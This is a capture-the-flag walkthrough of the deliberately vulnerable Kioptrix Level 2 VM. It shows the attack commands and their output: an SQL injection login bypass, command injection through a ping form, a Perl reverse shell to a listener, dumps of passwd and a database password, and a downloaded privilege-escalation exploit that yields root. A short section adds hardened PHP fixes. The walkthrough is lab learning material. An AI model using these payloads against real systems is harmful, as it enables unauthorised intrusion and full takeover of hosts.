+ OSVDB-12184: /?=PHPE9568F34-D428-11d2-A769-00AA001ACF42: PHP reveals potentially sensitive information via certain HTTP requests that contain specific QUERY strings.
+ OSVDB-12184: /?=PHPE9568F35-D428-11d2-A769-00AA001ACF42: PHP reveals potentially sensitive information via certain HTTP requests that contain specific QUERY strings.
+ Server leaks inodes via ETags, header found with file /manual/, fields: 0x5770d 0x1c42 0xac5f9a00;5770b 0x206 0x84f07cc0
+ Uncommon header 'tcn' found, with contents: choice
+ OSVDB-3092: /manual/: Web server manual found.
+ OSVDB-3268: /icons/: Directory indexing found.
+ OSVDB-3268: /manual/images/: Directory indexing found.
+ OSVDB-3233: /icons/README: Apache default file found.
+ 8346 requests: 1 error(s) and 17 item(s) reported on remote host
+ End Time: 2016-08-09 02:15:36 (GMT-4) (27 seconds)
---------------------------------------------------------------------------
+ 1 host(s) tested
In the HTML body we see that the admin user is Administator.
<html>
<body>
<form method="post" name="frmLogin" id="frmLogin" action="index.php">
<table width="300" border="1" align="center" cellpadding="2" cellspacing="2">
<tr>
<td colspan='2' align='center'>
<b>Remote System Administration Login</b>
</td>
</tr>
<tr>
<td width="150">Username</td>
<td><input name="uname" type="text"></td>
</tr>
<tr>
<td width="150">Password</td>
<td>
<input name="psw" type="password">
</td>
</tr>
<tr>
<td colspan="2" align="center">
<input type="submit" name="btnLogin" value="Login">
</td>
</tr>
</table>
</form>
<!-- Start of HTML when logged in as Administator -->
</body>
</html>
Let us inject with the following user and password:
Administrator
' OR '1'='1
We have a panel that allows us to ping. Let us try this:
ping 127.0.0.1&whoami
Output:
apache
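The login bypass and the ping panel injection above both come from user input being pasted straight into a query or a shell command. As an added example (not code from the Kioptrix VM or this walkthrough), here are hardened replacements for the two handlers: the field names uname/psw and the script names index.php and pingit.php come from the page, while the $_POST['ip'] parameter, the users table and its password_hash column, the database credentials and PHP >= 7.1 with mysqli are assumptions.

```php
<?php
// Added example (not the VM's code). Assumes a `users` table with a
// `password_hash` column and a hypothetical POST field `ip` for pingit.php.

// Login (index.php): the original built the SQL from uname/psw, so a password
// of ' OR '1'='1 turned the WHERE clause into a tautology. A prepared statement
// sends the SQL text and the values separately, so quotes in the input can no
// longer change the query's structure.
function authenticate(mysqli $db, string $uname, string $psw): bool {
    $stmt = $db->prepare(
        'SELECT password_hash FROM users WHERE username = ? LIMIT 1');
    $stmt->bind_param('s', $uname);
    $stmt->execute();
    $stmt->bind_result($hash);
    $found = $stmt->fetch();
    $stmt->close();
    // Compare against a password_hash() value, never a plaintext column.
    return $found && password_verify($psw, $hash);
}

// Ping panel (pingit.php): the original handed the submitted host to the shell,
// so "127.0.0.1&whoami" ran a second command as the apache user. Allow only a
// literal IP address, and still quote it so the shell sees a single argument.
function ping_host(string $target): ?string {
    if (filter_var($target, FILTER_VALIDATE_IP) === false) {
        return null;                 // reject hostnames, metacharacters, etc.
    }
    return shell_exec('ping -c 3 ' . escapeshellarg($target));
}

// Minimal request handling: generic error messages, and HTML-escape any command
// output before echoing it back into the page.
if ($_SERVER['REQUEST_METHOD'] === 'POST') {
    if (isset($_POST['ip'])) {
        $out = ping_host($_POST['ip']);
        echo $out === null
            ? 'Invalid IP address.'
            : '<pre>' . htmlspecialchars($out, ENT_QUOTES) . '</pre>';
    } elseif (isset($_POST['uname'], $_POST['psw'])) {
        // Placeholder credentials: use a least-privilege account, not the
        // hard-coded login found in the VM's index.php.
        $db = new mysqli('localhost', 'webapp_user', 'CHANGE_ME', 'webapp');
        echo authenticate($db, $_POST['uname'], $_POST['psw'])
            ? 'Logged in.' : 'Login failed.';
    }
}
```

Even with escapeshellarg() in place, the IP allow-list is the primary control; quoting alone would still let an attacker choose arbitrary ping targets or options if the validation were dropped.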
One more test:
ping 127.0.0.1&perl -v
This is perl, v5.8.5 built for i386-linux-thread-multi
Copyright 1987-2004, Larry Wall
Perl may be copied only under the terms of either the Artistic License or the
GNU General Public License, which may be found in the Perl 5 source kit.
Complete documentation for Perl, including FAQ lists, should be found on
this system using `man perl' or `perldoc perl'. If you have access to the
Internet, point your browser at http://www.perl.com/, the Perl Home Page.
Great! Let's get a shell:
ping 127.0.0.1&perl -MIO -e '$p=fork;exit,if($p);$c=new IO::Socket::INET(PeerAddr,"192.168.180.132:443");STDIN->fdopen($c,r);$~->fdopen($c,w);system$_ while<>;'
On our end:
nc -nlvp 443
listening on [any] 443 ...
connect to [192.168.180.132] from (UNKNOWN) [192.168.180.138] 32770
whoami
apache
ls
index.php
pingit.php
uname -a
Linux kioptrix.level2 2.6.9-55.EL #1 Wed May 2 13:52:16 EDT 2007 i686 i686 i386 GNU/Linux
<?php
mysql_connect("localhost", "john", "hiroshima") or die(mysql_error());
//print "Connected to MySQL<br />";
mysql_select_db("webapp");
root:x:0:0:root:/root:/bin/bash
bin:x:1:1:bin:/bin:/sbin/nologin
daemon:x:2:2:daemon:/sbin:/sbin/nologin
adm:x:3:4:adm:/var/adm:/sbin/nologin
lp:x:4:7:lp:/var/spool/lpd:/sbin/nologin
sync:x:5:0:sync:/sbin:/bin/sync
shutdown:x:6:0:shutdown:/sbin:/sbin/shutdown
halt:x:7:0:halt:/sbin:/sbin/halt
mail:x:8:12:mail:/var/spool/mail:/sbin/nologin
news:x:9:13:news:/etc/news:
uucp:x:10:14:uucp:/var/spool/uucp:/sbin/nologin
operator:x:11:0:operator:/root:/sbin/nologin
games:x:12:100:games:/usr/games:/sbin/nologin
gopher:x:13:30:gopher:/var/gopher:/sbin/nologin
ftp:x:14:50:FTP User:/var/ftp:/sbin/nologin
nobody:x:99:99:Nobody:/:/sbin/nologin
dbus:x:81:81:System message bus:/:/sbin/nologin
vcsa:x:69:69:virtual console memory owner:/dev:/sbin/nologin
rpm:x:37:37::/var/lib/rpm:/sbin/nologin
haldaemon:x:68:68:HAL daemon:/:/sbin/nologin
netdump:x:34:34:Network Crash Dump user:/var/crash:/bin/bash
nscd:x:28:28:NSCD Daemon:/:/sbin/nologin
sshd:x:74:74:Privilege-separated SSH:/var/empty/sshd:/sbin/nologin
rpc:x:32:32:Portmapper RPC user:/:/sbin/nologin
mailnull:x:47:47::/var/spool/mqueue:/sbin/nologin
smmsp:x:51:51::/var/spool/mqueue:/sbin/nologin
rpcuser:x:29:29:RPC Service User:/var/lib/nfs:/sbin/nologin
nfsnobody:x:65534:65534:Anonymous NFS User:/var/lib/nfs:/sbin/nologin
pcap:x:77:77::/var/arpwatch:/sbin/nologin
apache:x:48:48:Apache:/var/www:/sbin/nologin
squid:x:23:23::/var/spool/squid:/sbin/nologin
webalizer:x:67:67:Webalizer:/var/www/usage:/sbin/nologin
xfs:x:43:43:X Font Server:/etc/X11/fs:/sbin/nologin
ntp:x:38:38::/etc/ntp:/sbin/nologin
pegasus:x:66:65:tog-pegasus OpenPegasus WBEM/CIM services:/var/lib/Pegasus:/sbin/nologin
mysql:x:27:27:MySQL Server:/var/lib/mysql:/bin/bash
john:x:500:500::/home/john:/bin/bash
harold:x:501:501::/home/harold:/bin/bash
ps -aux
USER PID %CPU %MEM VSZ RSS TTY STAT START TIME COMMAND
root 1 0.0 0.4 3588 548 ? S Aug08 0:00 init [3]
root 2 0.0 0.0 0 0 ? SN Aug08 0:00 [ksoftirqd/0]
root 3 0.0 0.0 0 0 ? S< Aug08 0:00 [events/0]
root 4 0.0 0.0 0 0 ? S< Aug08 0:00 [khelper]
root 5 0.0 0.0 0 0 ? S< Aug08 0:00 [kacpid]
root 82 0.0 0.0 0 0 ? S< Aug08 0:00 [kblockd/0]
root 83 0.0 0.0 0 0 ? S Aug08 0:00 [khubd]
root 100 0.0 0.0 0 0 ? S Aug08 0:00 [pdflush]
root 101 0.0 0.0 0 0 ? S Aug08 0:00 [pdflush]
root 102 0.0 0.0 0 0 ? S Aug08 0:00 [kswapd0]
root 103 0.0 0.0 0 0 ? S< Aug08 0:00 [aio/0]
root 249 0.0 0.0 0 0 ? S Aug08 0:00 [kseriod]
root 482 0.0 0.0 0 0 ? S< Aug08 0:00 [ata/0]
root 483 0.0 0.0 0 0 ? S< Aug08 0:00 [ata_aux]
root 498 0.0 0.0 0 0 ? S Aug08 0:00 [kjournald]
root 1745 0.0 0.3 3120 440 ? S<s Aug08 0:00 udevd
root 1785 0.0 0.0 0 0 ? S Aug08 0:00 [shpchpd_event]
root 1862 0.0 0.0 0 0 ? S< Aug08 0:00 [kauditd]
root 1974 0.0 0.0 0 0 ? S Aug08 0:00 [kjournald]
root 2692 0.0 0.5 2432 680 ? Ss Aug08 0:00 /sbin/dhclient -1 -q -lf /var/lib/dhcp/dhclient-eth0.leases -pf /var/run/dhclient-eth0.pid eth0
root 2731 0.0 0.4 2196 540 ? Ss Aug08 0:00 syslogd -m 0
root 2735 0.0 0.3 1536 384 ? Ss Aug08 0:00 klogd -x
rpc 2762 0.0 0.4 2424 600 ? Ss Aug08 0:00 portmap
rpcuser 2781 0.0 0.6 3772 852 ? Ss Aug08 0:00 rpc.statd
root 2807 0.0 0.2 5504 368 ? Ss Aug08 0:00 rpc.idmapd
root 2880 0.0 0.3 3400 444 ? Ss Aug08 0:00 /usr/sbin/acpid
root 2964 0.0 0.9 5432 1140 ? Ss Aug08 0:00 /usr/sbin/sshd
root 2977 0.0 0.6 3352 768 ? Ss Aug08 0:00 xinetd -stayalive -pidfile /var/run/xinetd.pid
root 2995 0.0 1.6 8436 2044 ? Ss Aug08 0:00 sendmail: accepting connections
smmsp 3004 0.0 1.2 6932 1632 ? Ss Aug08 0:00 sendmail: Queue runner@01:00:00 for /var/spool/clientmqueue
root 3014 0.0 0.2 2936 352 ? Ss Aug08 0:00 gpm -m /dev/input/mice -t imps2
root 3023 0.0 0.7 6184 936 ? Ss Aug08 0:00 crond
xfs 3044 0.0 1.0 3940 1300 ? Ss Aug08 0:00 xfs -droppriv -daemon
root 3061 0.0 0.3 3128 428 ? Ss Aug08 0:00 /usr/sbin/atd
dbus 3070 0.0 0.6 2604 804 ? Ss Aug08 0:00 dbus-daemon-1 --system
root 3079 0.0 4.5 8808 5772 ? Ss Aug08 0:00 hald
root 3399 0.0 0.5 3328 680 ? Ss Aug08 0:00 dhclient
root 3401 0.0 8.1 22088 10272 ? Ss Aug08 0:00 httpd
root 3427 0.0 0.9 4460 1236 ? S Aug08 0:00 /bin/sh /usr/bin/mysqld_safe --datadir=/var/lib/mysql --socket=/var/lib/mysql/mysql.sock --err-log=/var/log/mysqld.log --pid-file=/var/run/mysqld/mysqld.pid
mysql 3469 0.0 14.8 127236 18736 ? Sl Aug08 0:00 /usr/libexec/mysqld --basedir=/usr --datadir=/var/lib/mysql --user=mysql --pid-file=/var/run/mysqld/mysqld.pid --skip-external-locking --socket=/var/lib/mysql/mysql.sock
root 3499 0.0 0.3 3124 388 tty1 Ss+ Aug08 0:00 /sbin/mingetty tty1
root 3500 0.0 0.3 3300 384 tty2 Ss+ Aug08 0:00 /sbin/mingetty tty2
root 3501 0.0 0.3 3460 388 tty3 Ss+ Aug08 0:00 /sbin/mingetty tty3
root 3502 0.0 0.3 3444 388 tty4 Ss+ Aug08 0:00 /sbin/mingetty tty4
root 3503 0.0 0.3 2928 384 tty5 Ss+ Aug08 0:00 /sbin/mingetty tty5
root 3504 0.0 0.3 2964 388 tty6 Ss+ Aug08 0:00 /sbin/mingetty tty6
root 4973 0.0 1.7 9564 2256 ? SNs Aug08 0:00 cupsd
apache 5112 0.0 4.7 22088 5976 ? S Aug08 0:00 httpd
apache 5113 0.0 4.7 22088 5976 ? S Aug08 0:00 httpd
apache 5114 0.0 4.7 22088 5976 ? S Aug08 0:00 httpd
apache 5115 0.0 4.7 22088 5976 ? S Aug08 0:00 httpd
apache 5116 0.0 4.7 22088 5976 ? S Aug08 0:00 httpd
apache 5117 0.0 4.7 22088 5976 ? S Aug08 0:00 httpd
apache 5118 0.0 4.7 22088 5976 ? S Aug08 0:00 httpd
apache 5119 0.0 4.7 22088 5976 ? S Aug08 0:00 httpd
apache 10408 0.0 2.3 7560 3020 ? S 00:01 0:00 perl -MIO -e $p=fork;exit,if($p);$c=new IO::Socket::INET(PeerAddr,"192.168.180.132:443");STDIN->fdopen($c,r);$~->fdopen($c,w);system$_ while<>;
apache 10482 0.0 0.6 3600 796 ? R 00:05 0:00 ps -aux
cat /etc/issue
Welcome to Kioptrix Level 2 Penetration and Assessment Environment
--The object of this game:
|_Acquire "root" access to this machine.
There are many ways this can be done, try and find more then one way to
appreciate this exercise.
DISCLAIMER: Kioptrix is not resposible for any damage or instability
caused by running, installing or using this VM image.
Use at your own risk.
WARNING: This is a vulnerable system, DO NOT run this OS in a production
environment. Nor should you give this system access to the outside world
(the Internet - or Interwebs..)
Good luck and have fun!
OK, nice info. Let's exploit:
wget -P /tmp/ http://192.168.180.132/9542.c
gcc /tmp/9542.c -o /tmp/9542
bash -i
exec /tmp/9542
whoami
root
Game over.
Best Regards,
Yuriy Stacnhev/URIX